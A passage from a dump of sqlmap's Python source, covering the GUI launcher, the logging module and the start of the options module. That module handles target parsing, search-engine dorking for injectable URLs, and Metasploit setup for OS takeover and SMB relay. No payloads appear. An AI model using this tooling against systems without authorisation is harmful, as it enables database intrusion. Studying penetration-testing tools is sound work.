queue\n\n        if process:\n            try:\n                process.stdin.write((\"%s\\n\" % line.strip()).encode())\n                process.stdin.flush()\n            except socket.error:\n                line = \"\"\n                event.widget.master.master.destroy()\n                return \"break\"\n            except:\n                return\n\n            event.widget.insert(_tkinter.END, \"\\n\")\n\n            return \"break\"\n\n    def run():\n        global alive\n        global process\n        global queue\n\n        config = {}\n\n        for key in window._widgets:\n            dest, type = key\n            widget = window._widgets[key]\n\n            if hasattr(widget, \"get\") and not widget.get():\n                value = None\n            elif type == \"string\":\n                value = widget.get()\n            elif type == \"float\":\n                value = float(widget.get())\n            elif type == \"int\":\n                value = int(widget.get())\n            else:\n                value = bool(widget.var.get())\n\n            config[dest] = value\n\n        for option in parser.option_list:\n            config[option.dest] = defaults.get(option.dest, None)\n\n        handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True)\n        os.close(handle)\n\n        saveConfig(config, configFile)\n\n        def enqueue(stream, queue):\n            global alive\n\n            for line in iter(stream.readline, b''):\n                queue.put(line)\n\n            alive = False\n            stream.close()\n\n        alive = True\n\n        process = subprocess.Popen([sys.executable or \"python\", os.path.join(paths.SQLMAP_ROOT_PATH, \"sqlmap.py\"), \"-c\", configFile], shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, bufsize=1, close_fds=not IS_WIN)\n\n        # Reference: https://stackoverflow.com/a/4896288\n        queue = _queue.Queue()\n        thread = threading.Thread(target=enqueue, args=(process.stdout, queue))\n        thread.daemon = True\n        thread.start()\n\n        top = _tkinter.Toplevel()\n        top.title(\"Console\")\n\n        # Reference: https://stackoverflow.com/a/13833338\n        text = _tkinter_scrolledtext.ScrolledText(top, undo=True)\n        text.bind(\"<Key>\", onKeyPress)\n        text.bind(\"<Return>\", onReturnPress)\n        text.pack()\n        text.focus()\n\n        center(top)\n\n        while True:\n            line = \"\"\n            try:\n                # line = queue.get_nowait()\n                line = queue.get(timeout=.1)\n                text.insert(_tkinter.END, line)\n            except _queue.Empty:\n                text.see(_tkinter.END)\n                text.update_idletasks()\n\n                if not alive:\n                    break\n\n    menubar = _tkinter.Menu(window)\n\n    filemenu = _tkinter.Menu(menubar, tearoff=0)\n    filemenu.add_command(label=\"Open\", state=_tkinter.DISABLED)\n    filemenu.add_command(label=\"Save\", state=_tkinter.DISABLED)\n    filemenu.add_separator()\n    filemenu.add_command(label=\"Exit\", command=window.quit)\n    menubar.add_cascade(label=\"File\", menu=filemenu)\n\n    menubar.add_command(label=\"Run\", command=run)\n\n    helpmenu = _tkinter.Menu(menubar, tearoff=0)\n    helpmenu.add_command(label=\"Official site\", command=lambda: webbrowser.open(SITE))\n    helpmenu.add_command(label=\"Github pages\", command=lambda: webbrowser.open(GIT_PAGE))\n    helpmenu.add_command(label=\"Wiki pages\", command=lambda: webbrowser.open(WIKI_PAGE))\n    helpmenu.add_command(label=\"Report issue\", command=lambda: webbrowser.open(ISSUES_PAGE))\n    helpmenu.add_separator()\n    helpmenu.add_command(label=\"About\", command=lambda: _tkinter_messagebox.showinfo(\"About\", \"Copyright (c) 2006-2022\\n\\n    (%s)\" % DEV_EMAIL_ADDRESS))\n    menubar.add_cascade(label=\"Help\", menu=helpmenu)\n\n    window.config(menu=menubar)\n    window._widgets = {}\n\n    notebook = AutoresizableNotebook(window)\n\n    first = None\n    frames = {}\n\n    for group in parser.option_groups:\n        frame = frames[group.title] = _tkinter.Frame(notebook, width=200, height=200)\n        notebook.add(frames[group.title], text=group.title)\n\n        _tkinter.Label(frame).grid(column=0, row=0, sticky=_tkinter.W)\n\n        row = 1\n        if group.get_description():\n            _tkinter.Label(frame, text=\"%s:\" % group.get_description()).grid(column=0, row=1, columnspan=3, sticky=_tkinter.W)\n            _tkinter.Label(frame).grid(column=0, row=2, sticky=_tkinter.W)\n            row += 2\n\n        for option in group.option_list:\n            _tkinter.Label(frame, text=\"%s \" % parser.formatter._format_option_strings(option)).grid(column=0, row=row, sticky=_tkinter.W)\n\n            if option.type == \"string\":\n                widget = _tkinter.Entry(frame)\n            elif option.type == \"float\":\n                widget = ConstrainedEntry(frame, regex=r\"\\A\\d*\\.?\\d*\\Z\")\n            elif option.type == \"int\":\n                widget = ConstrainedEntry(frame, regex=r\"\\A\\d*\\Z\")\n            else:\n                var = _tkinter.IntVar()\n                widget = _tkinter.Checkbutton(frame, variable=var)\n                widget.var = var\n\n            first = first or widget\n            widget.grid(column=1, row=row, sticky=_tkinter.W)\n\n            window._widgets[(option.dest, option.type)] = widget\n\n            default = defaults.get(option.dest)\n            if default:\n                if hasattr(widget, \"insert\"):\n                    widget.insert(0, default)\n\n            _tkinter.Label(frame, text=\" %s\" % option.help).grid(column=2, row=row, sticky=_tkinter.W)\n\n            row += 1\n\n        _tkinter.Label(frame).grid(column=0, row=row, sticky=_tkinter.W)\n\n    notebook.pack(expand=1, fill=\"both\")\n    notebook.enable_traversal()\n\n    first.focus()\n\n    window.mainloop()\n"
  },
  {
    "path": "sqlmap/lib/core/log.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport logging\nimport re\nimport sys\n\nfrom lib.core.enums import CUSTOM_LOGGING\n\nlogging.addLevelName(CUSTOM_LOGGING.PAYLOAD, \"PAYLOAD\")\nlogging.addLevelName(CUSTOM_LOGGING.TRAFFIC_OUT, \"TRAFFIC OUT\")\nlogging.addLevelName(CUSTOM_LOGGING.TRAFFIC_IN, \"TRAFFIC IN\")\n\nLOGGER = logging.getLogger(\"sqlmapLog\")\n\nLOGGER_HANDLER = None\ntry:\n    from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler\n\n    class _ColorizingStreamHandler(ColorizingStreamHandler):\n        def colorize(self, message, levelno, force=False):\n            if levelno in self.level_map and (self.is_tty or force):\n                bg, fg, bold = self.level_map[levelno]\n                params = []\n\n                if bg in self.color_map:\n                    params.append(str(self.color_map[bg] + 40))\n\n                if fg in self.color_map:\n                    params.append(str(self.color_map[fg] + 30))\n\n                if bold:\n                    params.append('1')\n\n                if params and message:\n                    match = re.search(r\"\\A(\\s+)\", message)\n                    prefix = match.group(1) if match else \"\"\n                    message = message[len(prefix):]\n\n                    match = re.search(r\"\\[([A-Z ]+)\\]\", message)  # log level\n                    if match:\n                        level = match.group(1)\n                        if message.startswith(self.bold):\n                            message = message.replace(self.bold, \"\")\n                            reset = self.reset + self.bold\n                            params.append('1')\n                        else:\n                            reset = self.reset\n                        message = message.replace(level, ''.join((self.csi, ';'.join(params), 'm', level, reset)), 1)\n\n                        match = re.search(r\"\\A\\s*\\[([\\d:]+)\\]\", message)  # time\n                        if match:\n                            time = match.group(1)\n                            message = message.replace(time, ''.join((self.csi, str(self.color_map[\"cyan\"] + 30), 'm', time, self._reset(message))), 1)\n\n                        match = re.search(r\"\\[(#\\d+)\\]\", message)  # counter\n                        if match:\n                            counter = match.group(1)\n                            message = message.replace(counter, ''.join((self.csi, str(self.color_map[\"yellow\"] + 30), 'm', counter, self._reset(message))), 1)\n\n                        if level != \"PAYLOAD\":\n                            if any(_ in message for _ in (\"parsed DBMS error message\",)):\n                                match = re.search(r\": '(.+)'\", message)\n                                if match:\n                                    string = match.group(1)\n                                    message = message.replace(\"'%s'\" % string, \"'%s'\" % ''.join((self.csi, str(self.color_map[\"white\"] + 30), 'm', string, self._reset(message))), 1)\n                            else:\n                                match = re.search(r\"\\bresumed: '(.+\\.\\.\\.)\", message)\n                                if match:\n                                    string = match.group(1)\n                                    message = message.replace(\"'%s\" % string, \"'%s\" % ''.join((self.csi, str(self.color_map[\"white\"] + 30), 'm', string, self._reset(message))), 1)\n                                else:\n                                    match = re.search(r\" \\('(.+)'\\)\\Z\", message) or re.search(r\"output: '(.+)'\\Z\", message)\n                                    if match:\n                                        string = match.group(1)\n                                        message = message.replace(\"'%s'\" % string, \"'%s'\" % ''.join((self.csi, str(self.color_map[\"white\"] + 30), 'm', string, self._reset(message))), 1)\n                                    else:\n                                        for match in re.finditer(r\"[^\\w]'([^']+)'\", message):  # single-quoted\n                                            string = match.group(1)\n                                            message = message.replace(\"'%s'\" % string, \"'%s'\" % ''.join((self.csi, str(self.color_map[\"white\"] + 30), 'm', string, self._reset(message))), 1)\n                    else:\n                        message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset))\n\n                    if prefix:\n                        message = \"%s%s\" % (prefix, message)\n\n                    message = message.replace(\"%s]\" % self.bold, \"]%s\" % self.bold)  # dirty patch\n\n            return message\n\n    disableColor = False\n\n    for argument in sys.argv:\n        if \"disable-col\" in argument:\n            disableColor = True\n            break\n\n    if disableColor:\n        LOGGER_HANDLER = logging.StreamHandler(sys.stdout)\n    else:\n        LOGGER_HANDLER = _ColorizingStreamHandler(sys.stdout)\n        LOGGER_HANDLER.level_map[logging.getLevelName(\"PAYLOAD\")] = (None, \"cyan\", False)\n        LOGGER_HANDLER.level_map[logging.getLevelName(\"TRAFFIC OUT\")] = (None, \"magenta\", False)\n        LOGGER_HANDLER.level_map[logging.getLevelName(\"TRAFFIC IN\")] = (\"magenta\", None, False)\nexcept ImportError:\n    LOGGER_HANDLER = logging.StreamHandler(sys.stdout)\n\nFORMATTER = logging.Formatter(\"\\r[%(asctime)s] [%(levelname)s] %(message)s\", \"%H:%M:%S\")\n\nLOGGER_HANDLER.setFormatter(FORMATTER)\nLOGGER.addHandler(LOGGER_HANDLER)\nLOGGER.setLevel(logging.INFO)\n"
  },
  {
    "path": "sqlmap/lib/core/option.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport codecs\nimport functools\nimport glob\nimport inspect\nimport logging\nimport os\nimport random\nimport re\nimport socket\nimport sys\nimport tempfile\nimport threading\nimport time\nimport traceback\n\nfrom lib.controller.checks import checkConnection\nfrom lib.core.common import Backend\nfrom lib.core.common import boldifyMessage\nfrom lib.core.common import checkFile\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import decodeStringEscape\nfrom lib.core.common import fetchRandomAgent\nfrom lib.core.common import filterNone\nfrom lib.core.common import findLocalPort\nfrom lib.core.common import findPageForms\nfrom lib.core.common import getConsoleWidth\nfrom lib.core.common import getFileItems\nfrom lib.core.common import getFileType\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import intersect\nfrom lib.core.common import normalizePath\nfrom lib.core.common import ntToPosixSlashes\nfrom lib.core.common import openFile\nfrom lib.core.common import parseRequestFile\nfrom lib.core.common import parseTargetDirect\nfrom lib.core.common import paths\nfrom lib.core.common import randomStr\nfrom lib.core.common import readCachedFileContent\nfrom lib.core.common import readInput\nfrom lib.core.common import resetCookieJar\nfrom lib.core.common import runningAsAdmin\nfrom lib.core.common import safeExpandUser\nfrom lib.core.common import safeFilepathEncode\nfrom lib.core.common import saveConfig\nfrom lib.core.common import setColor\nfrom lib.core.common import setOptimize\nfrom lib.core.common import setPaths\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import urldecode\nfrom lib.core.compat import cmp\nfrom lib.core.compat import round\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import mergedOptions\nfrom lib.core.data import queries\nfrom lib.core.datatype import AttribDict\nfrom lib.core.datatype import InjectionDict\nfrom lib.core.datatype import OrderedSet\nfrom lib.core.defaults import defaults\nfrom lib.core.dicts import DBMS_DICT\nfrom lib.core.dicts import DUMP_REPLACEMENTS\nfrom lib.core.enums import ADJUST_TIME_DELAY\nfrom lib.core.enums import AUTH_TYPE\nfrom lib.core.enums import CUSTOM_LOGGING\nfrom lib.core.enums import DUMP_FORMAT\nfrom lib.core.enums import FORK\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import HTTPMETHOD\nfrom lib.core.enums import MKSTEMP_PREFIX\nfrom lib.core.enums import MOBILES\nfrom lib.core.enums import OPTION_TYPE\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PRIORITY\nfrom lib.core.enums import PROXY_TYPE\nfrom lib.core.enums import REFLECTIVE_COUNTER\nfrom lib.core.enums import WIZARD\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapFilePathException\nfrom lib.core.exception import SqlmapGenericException\nfrom lib.core.exception import SqlmapInstallationException\nfrom lib.core.exception import SqlmapMissingDependence\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapMissingPrivileges\nfrom lib.core.exception import SqlmapSilentQuitException\nfrom lib.core.exception import SqlmapSyntaxException\nfrom lib.core.exception import SqlmapSystemException\nfrom lib.core.exception import SqlmapUnsupportedDBMSException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.exception import SqlmapValueException\nfrom lib.core.log import FORMATTER\nfrom lib.core.optiondict import optDict\nfrom lib.core.settings import CODECS_LIST_PAGE\nfrom lib.core.settings import CUSTOM_INJECTION_MARK_CHAR\nfrom lib.core.settings import DBMS_ALIASES\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\nfrom lib.core.settings import DEFAULT_PAGE_ENCODING\nfrom lib.core.settings import DEFAULT_TOR_HTTP_PORTS\nfrom lib.core.settings import DEFAULT_TOR_SOCKS_PORTS\nfrom lib.core.settings import DEFAULT_USER_AGENT\nfrom lib.core.settings import DUMMY_URL\nfrom lib.core.settings import IGNORE_CODE_WILDCARD\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import KB_CHARS_BOUNDARY_CHAR\nfrom lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET\nfrom lib.core.settings import LOCALHOST\nfrom lib.core.settings import MAX_CONNECT_RETRIES\nfrom lib.core.settings import MAX_NUMBER_OF_THREADS\nfrom lib.core.settings import NULL\nfrom lib.core.settings import PARAMETER_SPLITTING_REGEX\nfrom lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT\nfrom lib.core.settings import PROXY_ENVIRONMENT_VARIABLES\nfrom lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE\nfrom lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX\nfrom lib.core.settings import SUPPORTED_DBMS\nfrom lib.core.settings import SUPPORTED_OS\nfrom lib.core.settings import TIME_DELAY_CANDIDATES\nfrom lib.core.settings import UNION_CHAR_REGEX\nfrom lib.core.settings import UNKNOWN_DBMS_VERSION\nfrom lib.core.settings import URI_INJECTABLE_REGEX\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.threads import setDaemon\nfrom lib.core.update import update\nfrom lib.parse.configfile import configFileParser\nfrom lib.parse.payloads import loadBoundaries\nfrom lib.parse.payloads import loadPayloads\nfrom lib.request.basic import checkCharEncoding\nfrom lib.request.basicauthhandler import SmartHTTPBasicAuthHandler\nfrom lib.request.chunkedhandler import ChunkedHandler\nfrom lib.request.connect import Connect as Request\nfrom lib.request.dns import DNSServer\nfrom lib.request.httpshandler import HTTPSHandler\nfrom lib.request.pkihandler import HTTPSPKIAuthHandler\nfrom lib.request.rangehandler import HTTPRangeHandler\nfrom lib.request.redirecthandler import SmartRedirectHandler\nfrom lib.utils.crawler import crawl\nfrom lib.utils.deps import checkDependencies\nfrom lib.utils.har import HTTPCollectorFactory\nfrom lib.utils.purge import purge\nfrom lib.utils.search import search\nfrom thirdparty import six\nfrom thirdparty.keepalive import keepalive\nfrom thirdparty.multipart import multipartpost\nfrom thirdparty.six.moves import collections_abc as _collections\nfrom thirdparty.six.moves import http_client as _http_client\nfrom thirdparty.six.moves import http_cookiejar as _http_cookiejar\nfrom thirdparty.six.moves import urllib as _urllib\nfrom thirdparty.socks import socks\nfrom xml.etree.ElementTree import ElementTree\n\nauthHandler = _urllib.request.BaseHandler()\nchunkedHandler = ChunkedHandler()\nhttpsHandler = HTTPSHandler()\nkeepAliveHandler = keepalive.HTTPHandler()\nproxyHandler = _urllib.request.ProxyHandler()\nredirectHandler = SmartRedirectHandler()\nrangeHandler = HTTPRangeHandler()\nmultipartPostHandler = multipartpost.MultipartPostHandler()\n\n# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html\ntry:\n    WindowsError\nexcept NameError:\n    WindowsError = None\n\ndef _loadQueries():\n    \"\"\"\n    Loads queries from 'xml/queries.xml' file.\n    \"\"\"\n\n    def iterate(node, retVal=None):\n        class DictObject(object):\n            def __init__(self):\n                self.__dict__ = {}\n\n            def __contains__(self, name):\n                return name in self.__dict__\n\n        if retVal is None:\n            retVal = DictObject()\n\n        for child in node.findall(\"*\"):\n            instance = DictObject()\n            retVal.__dict__[child.tag] = instance\n            if child.attrib:\n                instance.__dict__.update(child.attrib)\n            else:\n                iterate(child, instance)\n\n        return retVal\n\n    tree = ElementTree()\n    try:\n        tree.parse(paths.QUERIES_XML)\n    except Exception as ex:\n        errMsg = \"something appears to be wrong with \"\n        errMsg += \"the file '%s' ('%s'). Please make \" % (paths.QUERIES_XML, getSafeExString(ex))\n        errMsg += \"sure that you haven't made any changes to it\"\n        raise SqlmapInstallationException(errMsg)\n\n    for node in tree.findall(\"*\"):\n        queries[node.attrib['value']] = iterate(node)\n\ndef _setMultipleTargets():\n    \"\"\"\n    Define a configuration parameter if we are running in multiple target\n    mode.\n    \"\"\"\n\n    initialTargetsCount = len(kb.targets)\n    seen = set()\n\n    if not conf.logFile:\n        return\n\n    debugMsg = \"parsing targets list from '%s'\" % conf.logFile\n    logger.debug(debugMsg)\n\n    if not os.path.exists(conf.logFile):\n        errMsg = \"the specified list of targets does not exist\"\n        raise SqlmapFilePathException(errMsg)\n\n    if checkFile(conf.logFile, False):\n        for target in parseRequestFile(conf.logFile):\n            url, _, data, _, _ = target\n            key = re.sub(r\"(\\w+=)[^%s ]*\" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r\"\\g<1>\", \"%s %s\" % (url, data))\n            if key not in seen:\n                kb.targets.add(target)\n                seen.add(key)\n\n    elif os.path.isdir(conf.logFile):\n        files = os.listdir(conf.logFile)\n        files.sort()\n\n        for reqFile in files:\n            if not re.search(r\"([\\d]+)\\-request\", reqFile):\n                continue\n\n            for target in parseRequestFile(os.path.join(conf.logFile, reqFile)):\n                url, _, data, _, _ = target\n                key = re.sub(r\"(\\w+=)[^%s ]*\" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r\"\\g<1>\", \"%s %s\" % (url, data))\n                if key not in seen:\n                    kb.targets.add(target)\n                    seen.add(key)\n\n    else:\n        errMsg = \"the specified list of targets is not a file \"\n        errMsg += \"nor a directory\"\n        raise SqlmapFilePathException(errMsg)\n\n    updatedTargetsCount = len(kb.targets)\n\n    if updatedTargetsCount > initialTargetsCount:\n        infoMsg = \"sqlmap parsed %d \" % (updatedTargetsCount - initialTargetsCount)\n        infoMsg += \"(parameter unique) requests from the \"\n        infoMsg += \"targets list ready to be tested\"\n        logger.info(infoMsg)\n\ndef _adjustLoggingFormatter():\n    \"\"\"\n    Solves problem of line deletition caused by overlapping logging messages\n    and retrieved data info in inference mode\n    \"\"\"\n\n    if hasattr(FORMATTER, '_format'):\n        return\n\n    def format(record):\n        message = FORMATTER._format(record)\n        message = boldifyMessage(message)\n        if kb.get(\"prependFlag\"):\n            message = \"\\n%s\" % message\n            kb.prependFlag = False\n        return message\n\n    FORMATTER._format = FORMATTER.format\n    FORMATTER.format = format\n\ndef _setRequestFromFile():\n    \"\"\"\n    This function checks if the way to make a HTTP request is through supplied\n    textual file, parses it and saves the information into the knowledge base.\n    \"\"\"\n\n    if conf.requestFile:\n        for requestFile in re.split(PARAMETER_SPLITTING_REGEX, conf.requestFile):\n            requestFile = safeExpandUser(requestFile)\n            url = None\n            seen = set()\n\n            if not checkFile(requestFile, False):\n                errMsg = \"specified HTTP request file '%s' \" % requestFile\n                errMsg += \"does not exist\"\n                raise SqlmapFilePathException(errMsg)\n\n            infoMsg = \"parsing HTTP request from '%s'\" % requestFile\n            logger.info(infoMsg)\n\n            for target in parseRequestFile(requestFile):\n                url = target[0]\n                if url not in seen:\n                    kb.targets.add(target)\n                    if len(kb.targets) > 1:\n                        conf.multipleTargets = True\n                    seen.add(url)\n\n            if url is None:\n                errMsg = \"specified file '%s' \" % requestFile\n                errMsg += \"does not contain a usable HTTP request (with parameters)\"\n                raise SqlmapDataException(errMsg)\n\n    if conf.secondReq:\n        conf.secondReq = safeExpandUser(conf.secondReq)\n\n        if not checkFile(conf.secondReq, False):\n            errMsg = \"specified second-order HTTP request file '%s' \" % conf.secondReq\n            errMsg += \"does not exist\"\n            raise SqlmapFilePathException(errMsg)\n\n        infoMsg = \"parsing second-order HTTP request from '%s'\" % conf.secondReq\n        logger.info(infoMsg)\n\n        try:\n            target = next(parseRequestFile(conf.secondReq, False))\n            kb.secondReq = target\n        except StopIteration:\n            errMsg = \"specified second-order HTTP request file '%s' \" % conf.secondReq\n            errMsg += \"does not contain a valid HTTP request\"\n            raise SqlmapDataException(errMsg)\n\ndef _setCrawler():\n    if not conf.crawlDepth:\n        return\n\n    if not conf.bulkFile:\n        if conf.url:\n            crawl(conf.url)\n        elif conf.requestFile and kb.targets:\n            target = next(iter(kb.targets))\n            crawl(target[0], target[2], target[3])\n\ndef _doSearch():\n    \"\"\"\n    This function performs search dorking, parses results\n    and saves the testable hosts into the knowledge base.\n    \"\"\"\n\n    if not conf.googleDork:\n        return\n\n    kb.data.onlyGETs = None\n\n    def retrieve():\n        links = search(conf.googleDork)\n\n        if not links:\n            errMsg = \"unable to find results for your \"\n            errMsg += \"search dork expression\"\n            raise SqlmapGenericException(errMsg)\n\n        for link in links:\n            link = urldecode(link)\n            if re.search(r\"(.*?)\\?(.+)\", link) or conf.forms:\n                kb.targets.add((link, conf.method, conf.data, conf.cookie, None))\n            elif re.search(URI_INJECTABLE_REGEX, link, re.I):\n                if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:\n                    message = \"do you want to scan only results containing GET parameters? [Y/n] \"\n                    kb.data.onlyGETs = readInput(message, default='Y', boolean=True)\n                if not kb.data.onlyGETs or conf.googleDork:\n                    kb.targets.add((link, conf.method, conf.data, conf.cookie, None))\n\n        return links\n\n    while True:\n        links = retrieve()\n\n        if kb.targets:\n            infoMsg = \"found %d results for your \" % len(links)\n            infoMsg += \"search dork expression\"\n\n            if not conf.forms:\n                infoMsg += \", \"\n\n                if len(links) == len(kb.targets):\n                    infoMsg += \"all \"\n                else:\n                    infoMsg += \"%d \" % len(kb.targets)\n\n                infoMsg += \"of them are testable targets\"\n\n            logger.info(infoMsg)\n            break\n\n        else:\n            message = \"found %d results \" % len(links)\n            message += \"for your search dork expression, but none of them \"\n            message += \"have GET parameters to test for SQL injection. \"\n            message += \"Do you want to skip to the next result page? [Y/n]\"\n\n            if not readInput(message, default='Y', boolean=True):\n                raise SqlmapSilentQuitException\n            else:\n                conf.googlePage += 1\n\ndef _setStdinPipeTargets():\n    if isinstance(conf.stdinPipe, _collections.Iterable):\n        infoMsg = \"using 'STDIN' for parsing targets list\"\n        logger.info(infoMsg)\n\n        class _(object):\n            def __init__(self):\n                self.__rest = OrderedSet()\n\n            def __iter__(self):\n                return self\n\n            def __next__(self):\n                return self.next()\n\n            def next(self):\n                try:\n                    line = next(conf.stdinPipe)\n                except (IOError, OSError, TypeError):\n                    line = None\n\n                if line:\n                    match = re.search(r\"\\b(https?://[^\\s'\\\"]+|[\\w.]+\\.\\w{2,3}[/\\w+]*\\?[^\\s'\\\"]+)\", line, re.I)\n                    if match:\n                        return (match.group(0), conf.method, conf.data, conf.cookie, None)\n                elif self.__rest:\n                    return self.__rest.pop()\n\n                raise StopIteration()\n\n            def add(self, elem):\n                self.__rest.add(elem)\n\n        kb.targets = _()\n\ndef _setBulkMultipleTargets():\n    if not conf.bulkFile:\n        return\n\n    conf.bulkFile = safeExpandUser(conf.bulkFile)\n\n    infoMsg = \"parsing multiple targets list from '%s'\" % conf.bulkFile\n    logger.info(infoMsg)\n\n    if not checkFile(conf.bulkFile, False):\n        errMsg = \"the specified bulk file \"\n        errMsg += \"does not exist\"\n        raise SqlmapFilePathException(errMsg)\n\n    found = False\n    for line in getFileItems(conf.bulkFile):\n        if conf.scope and not re.search(conf.scope, line, re.I):\n            continue\n\n        if re.match(r\"[^ ]+\\?(.+)\", line, re.I) or kb.customInjectionMark in line or conf.data:\n            found = True\n            kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))\n\n    if not found and not conf.forms and not conf.crawlDepth:\n        warnMsg = \"no usable links found (with GET parameters)\"\n        logger.warning(warnMsg)\n\ndef _findPageForms():\n    if not conf.forms or conf.crawlDepth:\n        return\n\n    if conf.url and not checkConnection():\n        return\n\n    found = False\n    infoMsg = \"searching for forms\"\n    logger.info(infoMsg)\n\n    if not any((conf.bulkFile, conf.googleDork)):\n        page, _, _ = Request.queryPage(content=True, ignoreSecondOrder=True)\n        if findPageForms(page, conf.url, True, True):\n            found = True\n    else:\n        if conf.bulkFile:\n            targets = getFileItems(conf.bulkFile)\n        elif conf.googleDork:\n            targets = [_[0] for _ in kb.targets]\n            kb.targets.clear()\n        else:\n            targets = []\n\n        for i in xrange(len(targets)):\n            try:\n                target = targets[i].strip()\n\n                if not re.search(r\"(?i)\\Ahttp[s]*://\", target):\n                    target = \"http://%s\" % target\n\n                page, _, _ = Request.getPage(url=target.strip(), cookie=conf.cookie, crawling=True, raise404=False)\n                if findPageForms(page, target, False, True):\n                    found = True\n\n                if conf.verbose in (1, 2):\n                    status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets)))\n                    dataToStdout(\"\\r[%s] [INFO] %s\" % (time.strftime(\"%X\"), status), True)\n            except KeyboardInterrupt:\n                break\n            except Exception as ex:\n                errMsg = \"problem occurred while searching for forms at '%s' ('%s')\" % (target, getSafeExString(ex))\n                logger.error(errMsg)\n\n    if not found:\n        warnMsg = \"no forms found\"\n        logger.warning(warnMsg)\n\ndef _setDBMSAuthentication():\n    \"\"\"\n    Check and set the DBMS authentication credentials to run statements as\n    another user, not the session user\n    \"\"\"\n\n    if not conf.dbmsCred:\n        return\n\n    debugMsg = \"setting the DBMS authentication credentials\"\n    logger.debug(debugMsg)\n\n    match = re.search(r\"^(.+?):(.*?)$\", conf.dbmsCred)\n\n    if not match:\n        errMsg = \"DBMS authentication credentials value must be in format \"\n        errMsg += \"username:password\"\n        raise SqlmapSyntaxException(errMsg)\n\n    conf.dbmsUsername = match.group(1)\n    conf.dbmsPassword = match.group(2)\n\ndef _setMetasploit():\n    if not conf.osPwn and not conf.osSmb and not conf.osBof:\n        return\n\n    debugMsg = \"setting the takeover out-of-band functionality\"\n    logger.debug(debugMsg)\n\n    msfEnvPathExists = False\n\n    if IS_WIN:\n        try:\n            __import__(\"win32file\")\n        except ImportError:\n            errMsg = \"sqlmap requires third-party module 'pywin32' \"\n            errMsg += \"in order to use Metasploit functionalities on \"\n            errMsg += \"Windows. You can download it from \"\n            errMsg += \"'https://github.com/mhammond/pywin32'\"\n            raise SqlmapMissingDependence(errMsg)\n\n        if not conf.msfPath:\n            for candidate in os.environ.get(\"PATH\", \"\").split(';'):\n                if all(_ in candidate for _ in (\"metasploit\", \"bin\")):\n                    conf.msfPath = os.path.dirname(candidate.rstrip('\\\\'))\n                    break\n\n    if conf.osSmb:\n        isAdmin = runningAsAdmin()\n\n        if not isAdmin:\n            errMsg = \"you need to run sqlmap as an administrator \"\n            errMsg += \"if you want to perform a SMB relay attack because \"\n            errMsg += \"it will need to listen on a user-specified SMB \"\n            errMsg += \"TCP port for incoming connection attempts\"\n            raise SqlmapMissingPrivileges(errMsg)\n\n    if conf.msfPath:\n        for path in (conf.msfPath, os.path.join(conf.msfPath, \"bin\")):\n            if any(os.path.exists(normalizePath(os.path.join(path, \"%s%s\" % (_, \".bat\" if IS_WIN else \"\")))) for _ in (\"msfcli\", \"msfconsole\")):\n                msfEnvPathExists = True\n                if all(os.path.exists(normalizePath(os.path.join(path, \"%s%s\" % (_, \".bat\" if IS_WIN else \"\")))) for _ in (\"msfvenom\",)):\n                    kb.oldMsf = False\n                elif all(os.path.exists(normalizePath(os.path.join(path, \"%s%s\" % (_, \".bat\" if IS_WIN else \"\")))) for _ in (\"msfencode\", \"msfpayload\")):\n                    kb.oldMsf = True\n                else:\n                    msfEnvPathExists = False\n\n                conf.msfPath = path\n                break\n\n        if msfEnvPathExists:\n            debugMsg = \"provided Metasploit Framework path \"\n            debugMsg += \"'%s' is valid\" % conf.msfPath\n            logger.debug(debugMsg)\n        else:\n            warnMsg = \"the provided Metasploit Framework path \"\n            warnMsg += \"'%s' is not valid. The cause could \" % conf.msfPath\n            warnMsg += \"be that the path does not exists or that one \"\n            warnMsg += \"or more of the needed Metasploit executables \"\n            warnMsg += \"within msfcli, msfconsole, msfencode and \"\n            warnMsg += \"msfpayload do not exist\"\n            logger.warning(warnMsg)\n    else:\n        warnMsg = \"you did not provide the local path where Metasploit \"\n        warnMsg += \"Framework is installed\"\n        logger.warning(warnMsg)\n\n    if not msfEnvPathExists:\n        warnMsg = \"sqlmap is going to look for Metasploit Framework \"\n        warnMsg += \"installation inside the environment path(s)\"\n        logger.warning(warnMsg)\n\n        envPaths = os.environ.get(\"PATH\", \"\").split(\";\" if IS_WIN else \":\")\n\n        for envPath in envPaths:\n            envPath = envPath.replace(\";\", \"\")\n\n            if any(os.path.exists(normalizePath(os.path.join(envPath, \"%s%s\" % (_, \".bat\" if IS_WIN else \"\")))) for _ in 